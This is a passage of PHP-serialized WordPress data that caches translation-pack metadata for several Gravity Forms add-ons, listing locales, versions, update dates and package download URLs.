enius/gravityformsmadmimi/gravityformsmadmimi-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"nl-be\";a:7:{s:8:\"language\";s:5:\"nl_BE\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2022-06-29T15:47:04+00:00\";s:12:\"english_name\";s:15:\"Dutch (Belgium)\";s:11:\"native_name\";s:20:\"Nederlands (België)\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-nl_BE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2022-06-27T08:34:12+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2022-03-15T13:30:45+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T17:15:43+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:98:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:5:\"fr-ca\";a:7:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-03-02T20:45:05+00:00\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-fr_CA.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fr\";i:1;s:3:\"fra\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2020-10-21T11:52:31+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T17:15:26+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T17:15:49+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T17:15:52+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"hu\";a:7:{s:8:\"language\";s:5:\"hu_HU\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-03-02T20:45:09+00:00\";s:12:\"english_name\";s:9:\"Hungarian\";s:11:\"native_name\";s:6:\"Magyar\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-hu_HU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hu\";i:1;s:3:\"hun\";}}s:2:\"id\";a:7:{s:8:\"language\";s:5:\"id_ID\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-26T08:20:24+00:00\";s:12:\"english_name\";s:10:\"Indonesian\";s:11:\"native_name\";s:16:\"Bahasa Indonesia\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-id_ID.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"id\";i:1;s:3:\"ind\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T17:15:57+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-03-14T17:52:56+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:98:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"nb\";a:7:{s:8:\"language\";s:5:\"nb_NO\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-03-02T20:45:12+00:00\";s:12:\"english_name\";s:19:\"Norwegian (Bokmål)\";s:11:\"native_name\";s:13:\"Norsk bokmål\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-nb_NO.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nb\";i:1;s:3:\"nob\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2021-10-02T10:46:06+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T17:16:11+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2020-12-17T15:55:55+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ro\";a:7:{s:8:\"language\";s:5:\"ro_RO\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2022-06-27T09:53:11+00:00\";s:12:\"english_name\";s:8:\"Romanian\";s:11:\"native_name\";s:8:\"Română\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-ro_RO.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ro\";i:1;s:3:\"ron\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T17:16:17+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"sr\";a:7:{s:8:\"language\";s:5:\"sr_RS\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2022-06-27T09:53:16+00:00\";s:12:\"english_name\";s:7:\"Serbian\";s:11:\"native_name\";s:23:\"Српски језик\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-sr_RS.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sr\";i:1;s:3:\"srp\";}}s:5:\"es-mx\";a:7:{s:8:\"language\";s:5:\"es_MX\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2022-06-27T09:36:48+00:00\";s:12:\"english_name\";s:16:\"Spanish (Mexico)\";s:11:\"native_name\";s:19:\"Español de México\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-es_MX.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T17:15:36+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2021-08-02T17:35:32+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T17:16:24+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:101:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}s:2:\"uk\";a:7:{s:8:\"language\";s:2:\"uk\";s:7:\"version\";s:5:\"1.4.1\";s:7:\"updated\";s:25:\"2023-01-06T17:16:26+00:00\";s:12:\"english_name\";s:9:\"Ukrainian\";s:11:\"native_name\";s:20:\"Українська\";s:7:\"package\";s:98:\"https://packages.translationspress.com/rocketgenius/gravityformsmadmimi/gravityformsmadmimi-uk.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"uk\";i:1;s:3:\"ukr\";}}}}s:21:\"gravityformsmailchimp\";a:1:{s:12:\"translations\";a:20:{s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:16:35+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsmailchimp/gravityformsmailchimp-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:17:15+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsmailchimp/gravityformsmailchimp-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2022-06-27T08:43:13+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsmailchimp/gravityformsmailchimp-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2022-03-15T13:30:44+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsmailchimp/gravityformsmailchimp-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:16:52+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:102:\"https://packages.translationspress.com/rocketgenius/gravityformsmailchimp/gravityformsmailchimp-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:5:\"fr-ca\";a:7:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2019-12-10T13:04:54+00:00\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsmailchimp/gravityformsmailchimp-fr_CA.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fr\";i:1;s:3:\"fra\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2021-10-25T16:35:54+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsmailchimp/gravityformsmailchimp-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:16:39+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsmailchimp/gravityformsmailchimp-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:16:57+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsmailchimp/gravityformsmailchimp-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2021-10-17T13:48:34+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsmailchimp/gravityformsmailchimp-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:17:05+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsmailchimp/gravityformsmailchimp-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2023-02-04T16:58:16+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:102:\"https://packages.translationspress.com/rocketgenius/gravityformsmailchimp/gravityformsmailchimp-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"nb\";a:7:{s:8:\"language\";s:5:\"nb_NO\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:17:11+00:00\";s:12:\"english_name\";s:19:\"Norwegian (Bokmål)\";s:11:\"native_name\";s:13:\"Norsk bokmål\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsmailchimp/gravityformsmailchimp-nb_NO.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nb\";i:1;s:3:\"nob\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:17:17+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsmailchimp/gravityformsmailchimp-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:17:19+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsmailchimp/gravityformsmailchimp-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2021-10-25T23:02:38+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsmailchimp/gravityformsmailchimp-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:17:25+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsmailchimp/gravityformsmailchimp-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:16:47+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsmailchimp/gravityformsmailchimp-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:17:29+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsmailchimp/gravityformsmailchimp-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"5.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:17:31+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformsmailchimp/gravityformsmailchimp-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:26:\"gravityformspartialentries\";a:1:{s:12:\"translations\";a:22:{s:2:\"ar\";a:7:{s:8:\"language\";s:2:\"ar\";s:7:\"version\";s:3:\"1.7\";s:7:\"updated\";s:25:\"2023-02-20T14:25:47+00:00\";s:12:\"english_name\";s:6:\"Arabic\";s:11:\"native_name\";s:14:\"العربية\";s:7:\"package\";s:112:\"https://packages.translationspress.com/rocketgenius/gravityformspartialentries/gravityformspartialentries-ar.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ar\";i:1;s:3:\"ara\";}}s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:3:\"1.7\";s:7:\"updated\";s:25:\"2023-02-20T14:31:15+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:112:\"https://packages.translationspress.com/rocketgenius/gravityformspartialentries/gravityformspartialentries-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:3:\"1.7\";s:7:\"updated\";s:25:\"2022-06-27T10:03:45+00:00\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformspartialentries/gravityformspartialentries-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:3:\"1.7\";s:7:\"updated\";s:25:\"2022-06-23T19:13:23+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformspartialentries/gravityformspartialentries-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:3:\"1.7\";s:7:\"updated\";s:25:\"2023-01-06T17:18:21+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformspartialentries/gravityformspartialentries-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"nl-be\";a:7:{s:8:\"language\";s:5:\"nl_BE\";s:7:\"version\";s:3:\"1.7\";s:7:\"updated\";s:25:\"2022-06-29T15:47:04+00:00\";s:12:\"english_name\";s:15:\"Dutch (Belgium)\";s:11:\"native_name\";s:20:\"Nederlands (België)\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformspartialentries/gravityformspartialentries-nl_BE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:3:\"1.7\";s:7:\"updated\";s:25:\"2022-06-27T08:34:12+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformspartialentries/gravityformspartialentries-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:3:\"1.7\";s:7:\"updated\";s:25:\"2022-03-15T13:30:45+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformspartialentries/gravityformspartialentries-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:3:\"1.7\";s:7:\"updated\";s:25:\"2022-06-23T19:13:42+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:112:\"https://packages.translationspress.com/rocketgenius/gravityformspartialentries/gravityformspartialentries-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:3:\"1.7\";s:7:\"updated\";s:25:\"2020-10-21T13:19:25+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformspartialentries/gravityformspartialentries-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:3:\"1.7\";s:7:\"updated\";s:25:\"2023-01-06T17:17:46+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformspartialentries/gravityformspartialentries-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:3:\"1.7\";s:7:\"updated\";s:25:\"2023-01-06T17:18:03+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformspartialentries/gravityformspartialentries-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:3:\"1.7\";s:7:\"updated\";s:25:\"2023-01-06T17:18:05+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformspartialentries/gravityformspartialentries-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:3:\"1.7\";s:7:\"updated\";s:25:\"2023-01-06T17:18:12+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:115:\"https://packages.translationspress.com/rocketgenius/gravityformspartialentries/gravityformspartialentries-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:3:\"1.7\";s:7:\"updated\";s:25:\"2020-12-17T14:50:15+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:112:\"https://packages.translationspress.com/rocketgenius/gravityformspartialentries/gravityformspartialentr